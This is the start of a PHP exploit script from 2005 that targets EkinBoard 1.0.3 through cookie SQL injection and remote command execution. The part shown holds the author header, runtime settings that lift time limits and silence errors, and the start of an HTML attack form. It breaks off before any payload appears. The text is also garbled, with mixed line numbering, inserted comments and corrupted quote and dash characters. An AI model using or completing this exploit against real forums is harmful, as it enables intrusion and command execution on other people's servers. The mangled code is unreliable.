1 <?php
2 #
3 # ---ekin103_xpl.php 10.47 16/11/2005 #
4 # #
5 # EkinBoard 1.0.3 config.php SQL injection through cookie / #
6 # remote command execution #
7 # ---> (this works with magic_quotes_gpc off) #
8 # #
9 # coded by rgod #
10 # site: http://rgod.altervista.org #
11 # #
12 # usage: launch from Apache, fill in requested fields, then go! #
13 # #
14 # required php.ini settings to launch this script: #
15 # allow_call_time_pass_reference = on #
16 # register_globals = on #
17 # #
18 # Sun-Tzu: "The rising of birds in their flight is the sign of an ambuscade. #
19 # Startled beasts indicate that a sudden attack is coming." #
20
// Runtime setup, applied before any output is produced.

// Flush output to the client after every output call instead of buffering it.
ob_implicit_flush(true);

// Socket-based streams give up after 2 seconds of waiting.
ini_set('default_socket_timeout', 2);

// 0 lifts the script execution time limit.
ini_set('max_execution_time', 0);

// Report no PHP errors, warnings or notices at all; failures in the
// code that follows will therefore be silent.
error_reporting(0);
25
26 echo’<html><head><title>EkinBoard 1.0.3 config.php SQL Injection / cmmnds xctn
27 </title><meta http−equiv="Content−Type" content="text/html; charset=iso−8859−1">
28 <style type="text/css"> body {background−color:#111111; SCROLLBAR−ARROW−COLOR:
29
#ffffff; SCROLLBAR−BASE−COLOR: black; CURSOR: crosshair; color: #1CB081; } img
30
{background−color: #FFFFFF !important} input {background−color: #303030
31
!important} option { background−color: #303030 !importa